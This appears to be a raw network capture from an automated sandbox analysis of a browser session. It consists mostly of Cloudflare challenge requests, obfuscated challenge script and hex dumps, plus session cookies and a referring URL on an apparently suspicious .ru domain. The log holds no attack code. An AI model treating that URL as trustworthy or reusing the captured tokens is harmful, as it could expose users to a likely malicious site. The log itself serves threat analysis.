                                                                    Referer: https://r.bitualicar.ru/2Q5WxE/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Cookie: XSRF-TOKEN=eyJpdiI6IjJETXVOdGllbHAvSUxGeEZqb1lPOWc9PSIsInZhbHVlIjoiTE50V2ZLNzl4a2xZR1dCUGpyVld6TzhyVWtjYmxrNzg3dTNjVklJeG94YWoxZzZvdEFHbUFQMm5jd1B1ZXcrbmthL09tZERsUjZPU3h0TjZCSTlGT2o1TW13RTNtcmZJUS9tM3U0VVh5OEpjb0p3MVppT1NIWkVJeGFteklDOWgiLCJtYWMiOiI4YzAwNDE5MTVjMWVjMTJmOTE3YWNiMjBhMTBkNTJmNTNkODEyZDEzODgyMWE2OTU5NDVmZDYxYWFmYjAxZDNjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InVOUG53ZXBQRnYvU0Y0dVFOM1gwcXc9PSIsInZhbHVlIjoiYTcxYXpqdm9nMmRyT2RSNTFIMHlpWTgvbEw1a20xRTh4M2xFSGlaL09kUXdWRFJzc09DTnA1a2JQY1lYTkJ4YjUrcTZvVzVqT3NtS2RROEsrZTRGTVZ4NVMwMUcxdlJ6dms0SGtqQ2s1K3lwMUNsS21mK05TVi9xVUQwUnZuSi8iLCJtYWMiOiIyYTUyMGRmMGM2ODQyNzYxNWU0YTNhODZmNjFmYmQ5OThiYjI0MzA1NDYwMjA0YWFjMDk3NTc2NzhhZTBlMzk3IiwidGFnIjoiIn0%3D
                                                                    2025-01-15 21:50:14 UTC1067INHTTP/1.1 404 Not Found
                                                                    Date: Wed, 15 Jan 2025 21:50:14 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Cache-Control: max-age=14400
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tVdO1wjIvtScIyPqcAdcVd9vYWRCll2pZWUyzKb8JzQ7RJd0m%2Fe4SC4lLYJAf96ojd0utNG6LYsmArISY6fonxozflMfIvLZADtb9vIBWcJIBNqTaFHpVUX%2FsDnyeA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Vary: Accept-Encoding
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=5027&min_rtt=4984&rtt_var=1481&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2822&recv_bytes=2100&delivery_rate=545384&cwnd=239&unsent_bytes=0&cid=dedc56eef0add386&ts=196&x=0"
                                                                    CF-Cache-Status: HIT
                                                                    Age: 8784
                                                                    Server: cloudflare
                                                                    CF-RAY: 9029148c0e3fabfd-YYZ
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=13888&min_rtt=13872&rtt_var=5234&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1894&delivery_rate=208526&cwnd=32&unsent_bytes=0&cid=dc1ccad5b9cb667a&ts=4206&x=0"
                                                                    2025-01-15 21:50:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    17192.168.2.849739104.18.95.414434836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-15 21:50:14 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: empty
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2025-01-15 21:50:14 UTC240INHTTP/1.1 200 OK
                                                                    Date: Wed, 15 Jan 2025 21:50:14 GMT
                                                                    Content-Type: image/png
                                                                    Content-Length: 61
                                                                    Connection: close
                                                                    cache-control: max-age=2629800, public
                                                                    Server: cloudflare
                                                                    CF-RAY: 9029148d5e1b18ea-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2025-01-15 21:50:14 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                    Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    18192.168.2.849740104.18.95.414434836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-15 21:50:14 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=90291484da19c332&lang=auto HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: empty
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2025-01-15 21:50:14 UTC331INHTTP/1.1 200 OK
                                                                    Date: Wed, 15 Jan 2025 21:50:14 GMT
                                                                    Content-Type: application/javascript; charset=UTF-8
                                                                    Content-Length: 113726
                                                                    Connection: close
                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                    Server: cloudflare
                                                                    CF-RAY: 9029148ec90b0f51-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2025-01-15 21:50:14 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63
                                                                    Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fc
                                                                    2025-01-15 21:50:14 UTC1369INData Raw: 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 69 66 72 61 6d 65 5f 61 6c 74 22 3a 22 57 69 64 67 65 74 25 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 66 65 65 64 62 61 63
                                                                    Data Ascii: opers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","feedbac
                                                                    2025-01-15 21:50:14 UTC1369INData Raw: 2c 67 33 2c 67 37 2c 67 61 2c 67 62 2c 67 42 2c 67 43 2c 67 47 2c 67 48 2c 67 38 2c 67 39 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 38 39 38 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 33 35 29 29 2f 32 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 39 36 29 29 2f 33 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 39 35 29 29 2f 34 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 39 33 29 29 2f 35 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 37 36 29 29 2f 36 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 31 32 29 29 2f 37 29 2b 70 61 72 73 65 49 6e 74
                                                                    Data Ascii: ,g3,g7,ga,gb,gB,gC,gG,gH,g8,g9){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(898))/1+-parseInt(gI(1135))/2*(-parseInt(gI(1396))/3)+parseInt(gI(195))/4*(-parseInt(gI(1393))/5)+-parseInt(gI(1476))/6*(parseInt(gI(1512))/7)+parseInt
                                                                    2025-01-15 21:50:14 UTC1369INData Raw: 67 5a 28 31 30 35 38 29 5d 5b 67 5a 28 31 33 35 33 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 65 4d 5b 67 5a 28 31 30 35 38 29 5d 5b 67 5a 28 35 33 34 29 5d 2c 27 63 6f 64 65 27 3a 65 5b 67 5a 28 32 32 33 29 5d 2c 27 72 63 56 27 3a 65 4d 5b 67 5a 28 31 30 35 38 29 5d 5b 67 5a 28 31 32 33 35 29 5d 7d 2c 27 2a 27 29 29 7d 2c 67 29 7d 2c 65 4d 5b 67 4a 28 34 33 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 2c 68 2c 68 30 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 2c 43 2c 44 29 7b 69 3d 28 68 30 3d 67 4a 2c 7b 27 6f 79 6b 52 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 28 46 29 7d 2c 27 68 4b 6f 48 78 27 3a 68 30 28 35 36 30 29 2c 27 70 6c 72 50 77 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 2c 47 29 7b 72 65
                                                                    Data Ascii: gZ(1058)][gZ(1353)],'cfChlOutS':eM[gZ(1058)][gZ(534)],'code':e[gZ(223)],'rcV':eM[gZ(1058)][gZ(1235)]},'*'))},g)},eM[gJ(438)]=function(f,g,h,h0,i,j,k,l,m,n,o,s,x,B,C,D){i=(h0=gJ,{'oykRo':function(E,F){return E(F)},'hKoHx':h0(560),'plrPw':function(E,F,G){re
                                                                    2025-01-15 21:50:14 UTC1369INData Raw: 67 37 5b 68 30 28 33 30 37 29 5d 28 43 29 5b 68 30 28 33 32 31 29 5d 28 27 2b 27 2c 69 5b 68 30 28 31 32 36 37 29 5d 29 2c 73 5b 68 30 28 35 39 38 29 5d 28 69 5b 68 30 28 34 37 30 29 5d 28 27 76 5f 27 2b 65 4d 5b 68 30 28 31 30 35 38 29 5d 5b 68 30 28 31 31 31 36 29 5d 2b 27 3d 27 2c 44 29 29 7d 65 6c 73 65 20 72 65 74 75 72 6e 20 69 5b 68 30 28 32 32 32 29 5d 28 66 2c 69 5b 68 30 28 32 32 32 29 5d 28 67 2c 68 29 29 7d 63 61 74 63 68 28 47 29 7b 7d 7d 2c 65 4d 5b 67 4a 28 31 31 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 68 31 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 29 7b 28 68 31 3d 67 4a 2c 66 3d 7b 7d 2c 66 5b 68 31 28 35 35 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 20 69 6e 73 74 61 6e 63 65 6f
                                                                    Data Ascii: g7[h0(307)](C)[h0(321)]('+',i[h0(1267)]),s[h0(598)](i[h0(470)]('v_'+eM[h0(1058)][h0(1116)]+'=',D))}else return i[h0(222)](f,i[h0(222)](g,h))}catch(G){}},eM[gJ(119)]=function(e,h1,f,g,h,i,j,k,l,m,n,o){(h1=gJ,f={},f[h1(555)]=function(s,v){return s instanceo
                                                                    2025-01-15 21:50:14 UTC1369INData Raw: 65 4d 5b 67 4a 28 31 33 32 37 29 5d 28 67 4a 28 39 38 35 29 2c 66 75 6e 63 74 69 6f 6e 28 64 2c 68 52 2c 65 2c 66 2c 67 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 69 66 28 68 52 3d 67 4a 2c 65 3d 7b 7d 2c 65 5b 68 52 28 31 34 39 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 65 5b 68 52 28 31 30 31 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 65 5b 68 52 28 31 33 32 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 3d 69 7d 2c 65 5b 68 52 28 38 34 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 3d 69 7d 2c 65 5b 68 52 28 31 31 33 36 29 5d 3d 68 52 28 33 39 34 29 2c 65 5b 68 52 28 38 35 30 29 5d 3d 68 52 28
                                                                    Data Ascii: eM[gJ(1327)](gJ(985),function(d,hR,e,f,g,i,j,k,l,m){if(hR=gJ,e={},e[hR(1493)]=function(h,i){return h+i},e[hR(1019)]=function(h,i){return h<i},e[hR(1320)]=function(h,i){return h===i},e[hR(848)]=function(h,i){return h===i},e[hR(1136)]=hR(394),e[hR(850)]=hR(
                                                                    2025-01-15 21:50:14 UTC1369INData Raw: 5b 67 4a 28 35 38 38 29 5d 3d 66 73 2c 66 57 5b 67 4a 28 36 33 36 29 5d 3d 66 72 2c 66 57 5b 67 4a 28 37 30 30 29 5d 3d 66 43 2c 66 57 5b 67 4a 28 35 36 32 29 5d 3d 66 42 2c 66 57 5b 67 4a 28 34 35 37 29 5d 3d 66 41 2c 66 57 5b 67 4a 28 31 34 37 33 29 5d 3d 66 7a 2c 66 57 5b 67 4a 28 39 39 31 29 5d 3d 66 6b 2c 66 57 5b 67 4a 28 31 31 38 35 29 5d 3d 66 56 2c 66 57 5b 67 4a 28 31 35 31 29 5d 3d 66 6f 2c 66 57 5b 67 4a 28 31 30 36 32 29 5d 3d 66 6c 2c 66 57 5b 67 4a 28 36 31 37 29 5d 3d 66 68 2c 66 57 5b 67 4a 28 32 34 37 29 5d 3d 66 67 2c 65 4d 5b 67 4a 28 31 31 33 31 29 5d 3d 66 57 2c 65 4d 5b 67 4a 28 33 35 36 29 5d 3d 21 5b 5d 2c 65 4d 5b 67 4a 28 34 36 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 69 4c 29 7b 69 66 28 69 4c 3d 67 4a 2c 65 4d 5b 69 4c 28 33 35
                                                                    Data Ascii: [gJ(588)]=fs,fW[gJ(636)]=fr,fW[gJ(700)]=fC,fW[gJ(562)]=fB,fW[gJ(457)]=fA,fW[gJ(1473)]=fz,fW[gJ(991)]=fk,fW[gJ(1185)]=fV,fW[gJ(151)]=fo,fW[gJ(1062)]=fl,fW[gJ(617)]=fh,fW[gJ(247)]=fg,eM[gJ(1131)]=fW,eM[gJ(356)]=![],eM[gJ(460)]=function(iL){if(iL=gJ,eM[iL(35
                                                                    2025-01-15 21:50:14 UTC1369INData Raw: 72 6e 20 68 3d 3d 3d 69 7d 2c 27 59 50 56 58 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 6f 48 71 41 75 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 69 44 57 41 45 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 71 58 79 6e 59 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 2a 68 7d 2c 27 4a 6c 64 65 61 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 75 77 48 58 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 56 43 4a 49 41 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 7a 73
                                                                    Data Ascii: rn h===i},'YPVXN':function(h,i){return h!=i},'oHqAu':function(h,i){return h(i)},'iDWAE':function(h,i){return h<i},'qXynY':function(h,i){return i*h},'Jldea':function(h,i){return i==h},'uwHXo':function(h,i){return h>i},'VCJIA':function(h,i){return h==i},'zs
                                                                    2025-01-15 21:50:14 UTC1369INData Raw: 31 36 2c 43 29 3b 4b 3d 64 5b 6a 33 28 31 34 31 35 29 5d 28 64 5b 6a 33 28 31 33 31 36 29 5d 28 4b 2c 31 29 2c 31 2e 33 32 26 50 29 2c 64 5b 6a 33 28 38 30 33 29 5d 28 4c 2c 6f 2d 31 29 3f 28 4c 3d 30 2c 4a 5b 6a 33 28 38 34 37 29 5d 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3e 3e 3d 31 2c 43 2b 2b 29 3b 7d 47 2d 2d 2c 30 3d 3d 47 26 26 28 47 3d 4d 61 74 68 5b 6a 33 28 33 30 33 29 5d 28 32 2c 49 29 2c 49 2b 2b 29 2c 64 65 6c 65 74 65 20 45 5b 46 5d 7d 65 6c 73 65 20 50 5b 6a 33 28 31 32 34 39 29 5d 28 29 7d 65 6c 73 65 20 66 6f 72 28 50 3d 44 5b 46 5d 2c 43 3d 30 3b 43 3c 49 3b 4b 3d 4b 3c 3c 31 7c 64 5b 6a 33 28 38 37 36 29 5d 28 50 2c 31 29 2c 64 5b 6a 33 28 31 31 36 29 5d 28 4c 2c 64 5b 6a 33 28 35 35 37 29 5d 28 6f 2c 31 29 29 3f 28 4c 3d 30
                                                                    Data Ascii: 16,C);K=d[j3(1415)](d[j3(1316)](K,1),1.32&P),d[j3(803)](L,o-1)?(L=0,J[j3(847)](s(K)),K=0):L++,P>>=1,C++);}G--,0==G&&(G=Math[j3(303)](2,I),I++),delete E[F]}else P[j3(1249)]()}else for(P=D[F],C=0;C<I;K=K<<1|d[j3(876)](P,1),d[j3(116)](L,d[j3(557)](o,1))?(L=0
                                                                    2025-01-15 21:50:14 UTC1369INData Raw: 74 75 72 6e 20 6a 34 3d 6a 30 2c 64 5b 6a 34 28 31 31 36 29 5d 28 6e 75 6c 6c 2c 68 29 3f 27 27 3a 68 3d 3d 27 27 3f 6e 75 6c 6c 3a 66 2e 69 28 68 5b 6a 34 28 31 31 32 38 29 5d 2c 33 32 37 36 38 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 35 29 7b 72 65 74 75 72 6e 20 6a 35 3d 6a 34 2c 68 5b 6a 35 28 35 35 39 29 5d 28 69 29 7d 29 7d 2c 27 69 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 6a 36 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4d 2c 4f 2c 50 2c 51 2c 4c 29 7b 69 66 28 6a 36 3d 6a 30 2c 6a 36 28 37 32 37 29 21 3d 3d 6a 36 28 31 31 35 32 29 29 7b 66 6f 72 28 73 3d 5b 5d 2c 78 3d 34 2c 42 3d 34 2c 43 3d 33 2c 44 3d 5b 5d 2c 47 3d 6f 28 30 29 2c 48 3d 6a 2c 49 3d 31 2c 45 3d 30 3b 64 5b 6a 36 28 31 35 30 31 29 5d 28 33
                                                                    Data Ascii: turn j4=j0,d[j4(116)](null,h)?'':h==''?null:f.i(h[j4(1128)],32768,function(i,j5){return j5=j4,h[j5(559)](i)})},'i':function(i,j,o,j6,s,x,B,C,D,E,F,G,H,I,J,K,M,O,P,Q,L){if(j6=j0,j6(727)!==j6(1152)){for(s=[],x=4,B=4,C=3,D=[],G=o(0),H=j,I=1,E=0;d[j6(1501)](3


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    19192.168.2.849742104.18.94.414434836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-15 21:50:14 UTC1170OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/587605322:1736976641:hzSxMwNdKMvcs0n6J28XPhW8UvVhUfeqYsOGCs5a83Y/90291484da19c332/_SX7z.KCPU2XGGiOnMLS_Lppm3kR8Be8CF6Dp.QkJ_E-1736977813-1.1.1.1-Uj4fzoUrhuK3Sl.q1E2rsXgH8pmEEE06uw2Ire.ToEP2lXvUgKfDCFKrrfsra6uT HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    Content-Length: 3209
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    Content-type: application/x-www-form-urlencoded
                                                                    CF-Chl-RetryAttempt: 0
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    CF-Challenge: _SX7z.KCPU2XGGiOnMLS_Lppm3kR8Be8CF6Dp.QkJ_E-1736977813-1.1.1.1-Uj4fzoUrhuK3Sl.q1E2rsXgH8pmEEE06uw2Ire.ToEP2lXvUgKfDCFKrrfsra6uT
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: */*
                                                                    Origin: https://challenges.cloudflare.com
                                                                    Sec-Fetch-Site: same-origin
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: empty
                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/bip52/0x4AAAAAAA5Dtl6jm2_BdC5F/auto/fbE/normal/auto/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2025-01-15 21:50:14 UTC3209OUTData Raw: 76 5f 39 30 32 39 31 34 38 34 64 61 31 39 63 33 33 32 3d 53 32 54 2d 67 2d 45 2d 50 2d 43 2d 70 49 66 35 49 66 48 2d 49 64 4a 65 72 36 64 66 4b 49 63 63 66 44 7a 66 4a 24 2d 49 4e 66 39 2d 4a 54 36 4a 76 4e 54 66 33 58 4e 66 59 6b 49 6e 53 66 77 2d 49 48 54 66 4a 79 57 32 62 31 66 79 65 66 46 66 49 32 66 79 54 4c 24 66 7a 66 62 24 4a 63 66 65 24 58 54 66 50 31 24 62 36 66 53 73 72 58 70 78 2d 47 51 51 32 5a 66 79 4d 57 66 4b 2d 58 71 46 25 32 62 78 74 74 38 48 70 37 43 45 6b 53 55 30 54 66 59 73 66 53 68 65 66 77 35 73 45 4b 2d 62 43 75 66 62 53 66 58 73 35 61 59 38 6e 66 64 62 79 4c 37 78 61 4f 71 61 51 71 71 50 30 66 58 45 4b 74 77 66 66 4d 68 59 65 37 7a 54 66 2d 62 53 71 75 33 76 76 4c 2d 66 67 4a 4a 2d 66 4c 4e 42 65 70 2d 66 30 4c 2d 66 33 49 4a 53
                                                                    Data Ascii: v_90291484da19c332=S2T-g-E-P-C-pIf5IfH-IdJer6dfKIccfDzfJ$-INf9-JT6JvNTf3XNfYkInSfw-IHTfJyW2b1fyefFfI2fyTL$fzfb$Jcfe$XTfP1$b6fSsrXpx-GQQ2ZfyMWfK-XqF%2bxtt8Hp7CEkSU0TfYsfShefw5sEK-bCufbSfXs5aY8nfdbyL7xaOqaQqqP0fXEKtwffMhYe7zTf-bSqu3vvL-fgJJ-fLNBep-f0L-f3IJS
                                                                    2025-01-15 21:50:15 UTC751INHTTP/1.1 200 OK
                                                                    Date: Wed, 15 Jan 2025 21:50:15 GMT
                                                                    Content-Type: text/plain; charset=UTF-8
                                                                    Content-Length: 153128
                                                                    Connection: close
                                                                    cf-chl-gen: KpZO6D7AUTXP4sgn76nMS9y/ETveBq22eFdhsYQihaIBtnpIKqusdza+TD9sivED2gTIpr15a6Nhu3VpffcseHER8Oe7Eo85V6RNl9MWpnTPpj1ko24XbmJUjpr4lotJY1z9PU7o6BHRL+V0TQ3ANSP8V6UUjZYIXzkBbGji8qOxrjaYUIFMOcx5CvHeowk+OIx1Z7PqNim4kdbX5noMosjJfUeTDn2Jj69zvPdYcDjSLFjt+HQBMpLzEHT5KPXD0gv1aPqJexJzRrNP3WkA+vnnQX+D1luAEyi6glg7t5AiRZAiLTXCjWHL7vHKLxyWwnAV9Ppwe3uU/jueCSb4sWPgaaEmyXqLyJzGfw5nnucXjViZ9e7ApYNL8542d7up7DTZUvW1K2Kbqd3hdTMXl+ywloOYb2V+CAFO1i6MNwt2xGgV7U9PouYxbS9x83+HM1VhvltKUYskgYp37N2Nb3W1ZU+VdPVAW4Vn7/BRIps=$tfwMxIsE6vKv7GTQtL49bg==
                                                                    Server: cloudflare
                                                                    CF-RAY: 9029148fdbb8c35d-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2025-01-15 21:50:15 UTC618INData Raw: 57 31 4a 51 6c 4a 47 52 6c 49 52 53 63 57 39 38 5a 31 56 33 6e 47 75 51 65 32 39 58 66 6e 64 36 71 71 5a 6f 6d 71 32 61 65 6f 52 71 72 4b 75 78 68 36 57 44 63 34 32 6e 71 5a 79 4d 76 62 36 64 65 4c 61 4c 75 70 32 53 78 73 61 71 71 4c 2b 38 79 38 54 41 76 34 71 53 72 73 2b 4d 6b 62 4f 69 6a 37 62 4a 78 36 57 32 73 37 61 71 75 70 36 78 6c 36 36 7a 78 4f 66 66 37 4c 7a 69 71 71 7a 4b 35 4b 36 77 7a 75 58 57 73 4f 54 71 38 4d 6e 4a 31 66 4f 39 30 50 66 34 38 2b 51 41 77 2b 45 4a 42 75 62 63 79 41 37 67 35 65 6f 44 43 63 58 65 42 77 33 51 39 4e 58 77 37 52 51 57 36 50 4d 55 48 76 66 2b 48 74 73 66 35 77 67 66 4a 77 6f 72 39 77 77 49 49 66 73 69 41 41 38 42 4e 54 59 53 43 42 51 59 47 66 4d 34 2b 68 6b 56 41 54 38 2b 2b 2f 77 77 4e 69 59 54 53 77 67 63 4a 52 35
                                                                    Data Ascii: W1JQlJGRlIRScW98Z1V3nGuQe29Xfnd6qqZomq2aeoRqrKuxh6WDc42nqZyMvb6deLaLup2SxsaqqL+8y8TAv4qSrs+MkbOij7bJx6W2s7aqup6xl66zxOff7LziqqzK5K6wzuXWsOTq8MnJ1fO90Pf48+QAw+EJBubcyA7g5eoDCcXeBw3Q9NXw7RQW6PMUHvf+Htsf5wgfJwor9wwIIfsiAA8BNTYSCBQYGfM4+hkVAT8++/wwNiYTSwgcJR5
